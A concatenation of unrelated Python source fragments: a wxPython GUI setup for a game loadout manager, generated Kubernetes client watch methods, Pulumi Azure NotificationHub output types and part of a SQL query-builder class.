self.m_scintilla1.MarkerSetForeground( wx.stc.STC_MARKNUM_FOLDEROPENMID, wx.WHITE)
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERMIDTAIL, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.MarkerDefine( wx.stc.STC_MARKNUM_FOLDERTAIL, wx.stc.STC_MARK_EMPTY )
self.m_scintilla1.SetSelBackground( True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT ) )
self.m_scintilla1.SetSelForeground( True, wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHTTEXT ) )
bSizer15.Add( self.m_scintilla1, 1, wx.ALL|wx.EXPAND, 4 )
bSizer11.Add( bSizer15, 0, wx.EXPAND, 5 )
self.m_panel11.SetSizer( bSizer11 )
self.m_panel11.Layout()
bSizer11.Fit( self.m_panel11 )
bSizer10.Add( self.m_panel11, 1, wx.BOTTOM|wx.EXPAND|wx.RIGHT, 8 )
bSizer_blrlm_main.Add( bSizer10, 1, wx.EXPAND, 0 )
self.SetSizer( bSizer_blrlm_main )
self.Layout()
self.m_menubar1 = wx.MenuBar( 0|wx.BORDER_THEME|wx.CLIP_CHILDREN )
self.file = wx.Menu()
self.m_menuItem_file_playername = wx.MenuItem( self.file, wx.ID_ANY, u"Change Player Name", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_playername )
self.m_menuItem_file_playername.Enable( False )
self.m_menuItem_file_clearloadouts = wx.MenuItem( self.file, wx.ID_ANY, u"Clear All Loadouts", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_clearloadouts )
self.m_menuItem_file_clearloadouts.Enable( False )
self.m_menuItem_file_savesession = wx.MenuItem( self.file, wx.ID_ANY, u"Save Session", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_savesession )
self.m_menuItem_file_loadsession = wx.MenuItem( self.file, wx.ID_ANY, u"Load Session", wx.EmptyString, wx.ITEM_NORMAL )
self.file.Append( self.m_menuItem_file_loadsession )
self.m_menuItem_file_autosave = wx.MenuItem( self.file, wx.ID_ANY, u"Save Session on Exit", wx.EmptyString, wx.ITEM_CHECK )
self.file.Append( self.m_menuItem_file_autosave )
self.m_menuItem_file_autosave.Check( True )
self.m_menubar1.Append( self.file, u"File" )
self.edit = wx.Menu()
self.m_menuItem_edit_swapweapon = wx.MenuItem( self.edit, wx.ID_ANY, u"Swap Weapon", wx.EmptyString, wx.ITEM_NORMAL )
self.edit.Append( self.m_menuItem_edit_swapweapon )
self.m_menuItem_edit_swapweapon.Enable( False )
self.m_menubar1.Append( self.edit, u"Edit" )
self.view = wx.Menu()
self.m_menuItem_view_0 = wx.MenuItem( self.view, wx.ID_ANY, u"Some checkbox thing", wx.EmptyString, wx.ITEM_CHECK )
self.view.Append( self.m_menuItem_view_0 )
self.m_menuItem_view_0.Enable( False )
self.m_menubar1.Append( self.view, u"View" )
self.tools = wx.Menu()
self.m_menubar1.Append( self.tools, u"Tools" )
self.help = wx.Menu()
self.m_menuItem_about = wx.MenuItem( self.help, wx.ID_ANY, u"About", wx.EmptyString, wx.ITEM_NORMAL )
self.help.Append( self.m_menuItem_about )
self.m_menuItem_about.Enable( False )
self.m_menubar1.Append( self.help, u"Help" )
self.SetMenuBar( self.m_menubar1 )
self.Centre( wx.BOTH )
# Connect Events
self.Bind( wx.EVT_CLOSE, self.BLR_LMGR_FRAMEOnClose )
self.m_panel_partselect_re1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_re1OnLeftUp )
self.m_bmToggleBtn_blrlm_receiver.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_receiverOnToggleButton )
self.m_bitmap_blrlm_receiver.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_receiverOnLeftUp )
self.m_staticText_blrlm_receiver.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_receiverOnLeftUp )
self.m_bpButton_blrlm_receiver_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_receiver_resetOnButtonClick )
self.m_panel_partselect_mz1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_mz1OnLeftUp )
self.m_bmToggleBtn_blrlm_muzzle.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_muzzleOnToggleButton )
self.m_bitmap_blrlm_muzzle.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_muzzleOnLeftUp )
self.m_staticText_blrlm_muzzle.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_muzzleOnLeftUp )
self.m_bpButton_blrlm_muzzle_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_muzzle_resetOnButtonClick )
self.m_panel_partselect_gp1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_gp1OnLeftUp )
self.m_bmToggleBtn_blrlm_grip.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_gripOnToggleButton )
self.m_bitmap_blrlm_grip.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_gripOnLeftUp )
self.m_staticText_blrlm_grip.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_gripOnLeftUp )
self.m_bpButton_blrlm_grip_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_grip_resetOnButtonClick )
self.m_panel_partselect_ba1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_ba1OnLeftUp )
self.m_bmToggleBtn_blrlm_barrel.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_barrelOnToggleButton )
self.m_bitmap_blrlm_barrel.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_barrelOnLeftUp )
self.m_staticText_blrlm_barrel.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_barrelOnLeftUp )
self.m_bpButton_blrlm_barrel_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_barrel_resetOnButtonClick )
self.m_panel_partselect_mg1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_mg1OnLeftUp )
self.m_bmToggleBtn_blrlm_magazine.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_magazineOnToggleButton )
self.m_bitmap_blrlm_magazine.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_magazineOnLeftUp )
self.m_staticText_blrlm_magazine.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_magazineOnLeftUp )
self.m_bpButton_blrlm_magazine_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_magazine_resetOnButtonClick )
self.m_panel_partselect_sc1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_sc1OnLeftUp )
self.m_bmToggleBtn_blrlm_scope.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_scopeOnToggleButton )
self.m_bitmap_blrlm_scope.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_scopeOnLeftUp )
self.m_staticText_blrlm_scope.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_scopeOnLeftUp )
self.m_bpButton_blrlm_scope_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_scope_resetOnButtonClick )
self.m_panel_partselect_st1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_st1OnLeftUp )
self.m_bmToggleBtn_blrlm_stock.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_stockOnToggleButton )
self.m_bitmap_blrlm_stock.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_stockOnLeftUp )
self.m_staticText_blrlm_stock.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_stockOnLeftUp )
self.m_bpButton_blrlm_stock_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_stock_resetOnButtonClick )
self.m_panel_partselect_tg1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_tg1OnLeftUp )
self.m_bmToggleBtn_blrlm_tag.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_tagOnToggleButton )
self.m_bitmap_blrlm_tag.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_tagOnLeftUp )
self.m_staticText_blrlm_tag.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_tagOnLeftUp )
self.m_bpButton_blrlm_tag_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_tag_resetOnButtonClick )
self.m_panel_partselect_cm1.Bind( wx.EVT_LEFT_UP, self.m_panel_partselect_cm1OnLeftUp )
self.m_bmToggleBtn_blrlm_camo.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtn_blrlm_camoOnToggleButton )
self.m_bitmap_blrlm_camo.Bind( wx.EVT_LEFT_UP, self.m_bitmap_blrlm_camoOnLeftUp )
self.m_staticText_blrlm_camo.Bind( wx.EVT_LEFT_UP, self.m_staticText_blrlm_camoOnLeftUp )
self.m_bpButton_blrlm_camo_reset.Bind( wx.EVT_BUTTON, self.m_bpButton_blrlm_camo_resetOnButtonClick )
self.m_bmToggleBtnLoadout1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout1OnToggleButton )
self.m_bmToggleBtnLoadout2.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout2OnToggleButton )
self.m_bmToggleBtnLoadout3.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnLoadout3OnToggleButton )
self.m_bmToggleBtnPrimary1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnPrimary1OnToggleButton )
self.m_bmToggleBtnSecondary1.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnSecondary1OnToggleButton )
self.m_bmToggleBtnPrimary2.Bind( wx.EVT_TOGGLEBUTTON, self.m_bmToggleBtnPrimary2OnToggleButton )
self.m_bmToggleBtnSecondary2.Bind( wx.EVT_TOGGLEBUTTON, | |
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_secret`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_namespaced_secret`")
resource_path = '/api/v1/watch/namespaces/{namespace}/secrets/{name}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_account_list(self, namespace, **kwargs):
"""
watch individual changes to a list of ServiceAccount
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_account_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_account_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_account_list`")
resource_path = '/api/v1/watch/namespaces/{namespace}/serviceaccounts'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_account(self, namespace, name, **kwargs):
"""
watch changes to an object of kind ServiceAccount
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_account(namespace, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str name: name of the ServiceAccount (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'name', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_account`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_namespaced_service_account`")
resource_path = '/api/v1/watch/namespaces/{namespace}/serviceaccounts/{name}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'watch' in params:
query_params['watch'] = params['watch']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = []
response = self.api_client.call_api(resource_path, method,
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=files,
response_type='JsonWatchEvent',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def watch_namespaced_service_list(self, namespace, **kwargs):
"""
watch individual changes to a list of Service
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_namespaced_service_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:return: JsonWatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'label_selector', 'field_selector', 'watch', 'resource_version', 'timeout_seconds']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_namespaced_service_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_namespaced_service_list`")
resource_path = '/api/v1/watch/namespaces/{namespace}/services'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] | |
"certificate_key", certificate_key)
if mpns_certificate is not None:
pulumi.set(__self__, "mpns_certificate", mpns_certificate)
if thumbprint is not None:
pulumi.set(__self__, "thumbprint", thumbprint)
@property
@pulumi.getter(name="certificateKey")
def certificate_key(self) -> Optional[str]:
"""
The certificate key for this credential.
"""
return pulumi.get(self, "certificate_key")
@property
@pulumi.getter(name="mpnsCertificate")
def mpns_certificate(self) -> Optional[str]:
"""
The MPNS certificate.
"""
return pulumi.get(self, "mpns_certificate")
@property
@pulumi.getter
def thumbprint(self) -> Optional[str]:
"""
The MPNS certificate Thumbprint
"""
return pulumi.get(self, "thumbprint")
@pulumi.output_type
class SharedAccessAuthorizationRulePropertiesResponse(dict):
"""
SharedAccessAuthorizationRule properties.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "claimType":
suggest = "claim_type"
elif key == "claimValue":
suggest = "claim_value"
elif key == "createdTime":
suggest = "created_time"
elif key == "keyName":
suggest = "key_name"
elif key == "modifiedTime":
suggest = "modified_time"
elif key == "primaryKey":
suggest = "primary_key"
elif key == "secondaryKey":
suggest = "secondary_key"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in SharedAccessAuthorizationRulePropertiesResponse. Access the value via the '{suggest}' property getter instead.")
    def __getitem__(self, key: str) -> Any:
        # Emit the camelCase-key warning (if applicable), then fall through
        # to the plain dict item lookup.
        SharedAccessAuthorizationRulePropertiesResponse.__key_warning(key)
        return super().__getitem__(key)
    def get(self, key: str, default = None) -> Any:
        # Emit the camelCase-key warning (if applicable), then defer to
        # ordinary dict.get semantics with the caller-supplied default.
        SharedAccessAuthorizationRulePropertiesResponse.__key_warning(key)
        return super().get(key, default)
def __init__(__self__, *,
claim_type: str,
claim_value: str,
created_time: str,
key_name: str,
modified_time: str,
primary_key: str,
revision: int,
secondary_key: str,
rights: Optional[Sequence[str]] = None):
"""
SharedAccessAuthorizationRule properties.
:param str claim_type: A string that describes the claim type
:param str claim_value: A string that describes the claim value
:param str created_time: The created time for this rule
:param str key_name: A string that describes the authorization rule.
:param str modified_time: The last modified time for this rule
:param str primary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param int revision: The revision number for the rule
:param str secondary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
:param Sequence[str] rights: The rights associated with the rule.
"""
pulumi.set(__self__, "claim_type", claim_type)
pulumi.set(__self__, "claim_value", claim_value)
pulumi.set(__self__, "created_time", created_time)
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "modified_time", modified_time)
pulumi.set(__self__, "primary_key", primary_key)
pulumi.set(__self__, "revision", revision)
pulumi.set(__self__, "secondary_key", secondary_key)
if rights is not None:
pulumi.set(__self__, "rights", rights)
@property
@pulumi.getter(name="claimType")
def claim_type(self) -> str:
"""
A string that describes the claim type
"""
return pulumi.get(self, "claim_type")
@property
@pulumi.getter(name="claimValue")
def claim_value(self) -> str:
"""
A string that describes the claim value
"""
return pulumi.get(self, "claim_value")
@property
@pulumi.getter(name="createdTime")
def created_time(self) -> str:
"""
The created time for this rule
"""
return pulumi.get(self, "created_time")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> str:
"""
A string that describes the authorization rule.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter(name="modifiedTime")
def modified_time(self) -> str:
"""
The last modified time for this rule
"""
return pulumi.get(self, "modified_time")
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "primary_key")
@property
@pulumi.getter
def revision(self) -> int:
"""
The revision number for the rule
"""
return pulumi.get(self, "revision")
@property
@pulumi.getter(name="secondaryKey")
def secondary_key(self) -> str:
"""
A base64-encoded 256-bit primary key for signing and validating the SAS token.
"""
return pulumi.get(self, "secondary_key")
@property
@pulumi.getter
def rights(self) -> Optional[Sequence[str]]:
"""
The rights associated with the rule.
"""
return pulumi.get(self, "rights")
@pulumi.output_type
class SharedAccessAuthorizationRuleResourceResponse(dict):
    """
    Description of a Namespace AuthorizationRules.
    """
    @staticmethod
    def __key_warning(key: str):
        # Consistency fix: sibling response classes in this module warn when a
        # camelCase wire key is used for dict access instead of the snake_case
        # property getter; this class has the same camelCase keys but lacked
        # the warning machinery.
        suggest = None
        if key == "claimType":
            suggest = "claim_type"
        elif key == "claimValue":
            suggest = "claim_value"
        elif key == "createdTime":
            suggest = "created_time"
        elif key == "keyName":
            suggest = "key_name"
        elif key == "modifiedTime":
            suggest = "modified_time"
        elif key == "primaryKey":
            suggest = "primary_key"
        elif key == "secondaryKey":
            suggest = "secondary_key"

        if suggest:
            pulumi.log.warn(f"Key '{key}' not found in SharedAccessAuthorizationRuleResourceResponse. Access the value via the '{suggest}' property getter instead.")

    def __getitem__(self, key: str) -> Any:
        SharedAccessAuthorizationRuleResourceResponse.__key_warning(key)
        return super().__getitem__(key)

    def get(self, key: str, default = None) -> Any:
        SharedAccessAuthorizationRuleResourceResponse.__key_warning(key)
        return super().get(key, default)

    def __init__(__self__, *,
                 claim_type: str,
                 claim_value: str,
                 created_time: str,
                 id: str,
                 key_name: str,
                 modified_time: str,
                 name: str,
                 primary_key: str,
                 revision: int,
                 secondary_key: str,
                 type: str,
                 location: Optional[str] = None,
                 rights: Optional[Sequence[str]] = None,
                 sku: Optional['outputs.SkuResponse'] = None,
                 tags: Optional[Mapping[str, str]] = None):
        """
        Description of a Namespace AuthorizationRules.
        :param str claim_type: A string that describes the claim type
        :param str claim_value: A string that describes the claim value
        :param str created_time: The created time for this rule
        :param str id: Resource Id
        :param str key_name: A string that describes the authorization rule.
        :param str modified_time: The last modified time for this rule
        :param str name: Resource name
        :param str primary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
        :param int revision: The revision number for the rule
        :param str secondary_key: A base64-encoded 256-bit primary key for signing and validating the SAS token.
        :param str type: Resource type
        :param str location: Resource location
        :param Sequence[str] rights: The rights associated with the rule.
        :param 'SkuResponse' sku: The sku of the created namespace
        :param Mapping[str, str] tags: Resource tags
        """
        pulumi.set(__self__, "claim_type", claim_type)
        pulumi.set(__self__, "claim_value", claim_value)
        pulumi.set(__self__, "created_time", created_time)
        pulumi.set(__self__, "id", id)
        pulumi.set(__self__, "key_name", key_name)
        pulumi.set(__self__, "modified_time", modified_time)
        pulumi.set(__self__, "name", name)
        pulumi.set(__self__, "primary_key", primary_key)
        pulumi.set(__self__, "revision", revision)
        pulumi.set(__self__, "secondary_key", secondary_key)
        pulumi.set(__self__, "type", type)
        # Optional fields are only registered when supplied.
        if location is not None:
            pulumi.set(__self__, "location", location)
        if rights is not None:
            pulumi.set(__self__, "rights", rights)
        if sku is not None:
            pulumi.set(__self__, "sku", sku)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter(name="claimType")
    def claim_type(self) -> str:
        """
        A string that describes the claim type
        """
        return pulumi.get(self, "claim_type")

    @property
    @pulumi.getter(name="claimValue")
    def claim_value(self) -> str:
        """
        A string that describes the claim value
        """
        return pulumi.get(self, "claim_value")

    @property
    @pulumi.getter(name="createdTime")
    def created_time(self) -> str:
        """
        The created time for this rule
        """
        return pulumi.get(self, "created_time")

    @property
    @pulumi.getter
    def id(self) -> str:
        """
        Resource Id
        """
        return pulumi.get(self, "id")

    @property
    @pulumi.getter(name="keyName")
    def key_name(self) -> str:
        """
        A string that describes the authorization rule.
        """
        return pulumi.get(self, "key_name")

    @property
    @pulumi.getter(name="modifiedTime")
    def modified_time(self) -> str:
        """
        The last modified time for this rule
        """
        return pulumi.get(self, "modified_time")

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Resource name
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="primaryKey")
    def primary_key(self) -> str:
        """
        A base64-encoded 256-bit primary key for signing and validating the SAS token.
        """
        return pulumi.get(self, "primary_key")

    @property
    @pulumi.getter
    def revision(self) -> int:
        """
        The revision number for the rule
        """
        return pulumi.get(self, "revision")

    @property
    @pulumi.getter(name="secondaryKey")
    def secondary_key(self) -> str:
        """
        A base64-encoded 256-bit primary key for signing and validating the SAS token.
        """
        return pulumi.get(self, "secondary_key")

    @property
    @pulumi.getter
    def type(self) -> str:
        """
        Resource type
        """
        return pulumi.get(self, "type")

    @property
    @pulumi.getter
    def location(self) -> Optional[str]:
        """
        Resource location
        """
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def rights(self) -> Optional[Sequence[str]]:
        """
        The rights associated with the rule.
        """
        return pulumi.get(self, "rights")

    @property
    @pulumi.getter
    def sku(self) -> Optional['outputs.SkuResponse']:
        """
        The sku of the created namespace
        """
        return pulumi.get(self, "sku")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        """
        Resource tags
        """
        return pulumi.get(self, "tags")
@pulumi.output_type
class SkuResponse(dict):
    """
    The Sku description for a namespace
    """
    def __init__(__self__, *,
                 name: str,
                 capacity: Optional[int] = None,
                 family: Optional[str] = None,
                 size: Optional[str] = None,
                 tier: Optional[str] = None):
        """
        The Sku description for a namespace
        :param str name: Name of the notification hub sku
        :param int capacity: The capacity of the resource
        :param str family: The Sku Family
        :param str size: The Sku size
        :param str tier: The tier of particular sku
        """
        pulumi.set(__self__, "name", name)
        # Optional fields are registered only when a value was supplied.
        for attr, value in (
            ("capacity", capacity),
            ("family", family),
            ("size", size),
            ("tier", tier),
        ):
            if value is not None:
                pulumi.set(__self__, attr, value)

    @property
    @pulumi.getter
    def name(self) -> str:
        """
        Name of the notification hub sku
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def capacity(self) -> Optional[int]:
        """
        The capacity of the resource
        """
        return pulumi.get(self, "capacity")

    @property
    @pulumi.getter
    def family(self) -> Optional[str]:
        """
        The Sku Family
        """
        return pulumi.get(self, "family")

    @property
    @pulumi.getter
    def size(self) -> Optional[str]:
        """
        The Sku size
        """
        return pulumi.get(self, "size")

    @property
    @pulumi.getter
    def tier(self) -> Optional[str]:
        """
        The tier of particular sku
        """
        return pulumi.get(self, "tier")
@pulumi.output_type
class WnsCredentialResponse(dict):
"""
Description of a NotificationHub WnsCredential.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "packageSid":
suggest = "package_sid"
elif key == "secretKey":
suggest = "secret_key"
elif key == "windowsLiveEndpoint":
suggest = "windows_live_endpoint"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WnsCredentialResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WnsCredentialResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WnsCredentialResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
package_sid: Optional[str] = None,
secret_key: Optional[str] = None,
windows_live_endpoint: Optional[str] = None):
"""
Description of a NotificationHub WnsCredential.
:param str | |
' + having
return self
def join(self, join):
if isinstance(join, str):
self.joinString += ' INNER JOIN ' + join
elif isinstance(join, (list, tuple)):
if len(join) != 2:
self.throw_exception("join子句的数组参数必须有两个元素")
self.joinString += ' ' + join[1] + ' JOIN ' + join[0]
else:
self.throw_exception("join子句的参数只支持字符串或list、tuple")
return self
    def fetchSql(self, fetchSql=True):
        """Enable SQL-preview mode: query methods then return the built SQL
        text instead of executing it.  Returns ``self`` for chaining.

        NOTE(review): this rebinds the instance attribute ``fetchSql`` to a
        bool, shadowing this bound method on the instance — a second call to
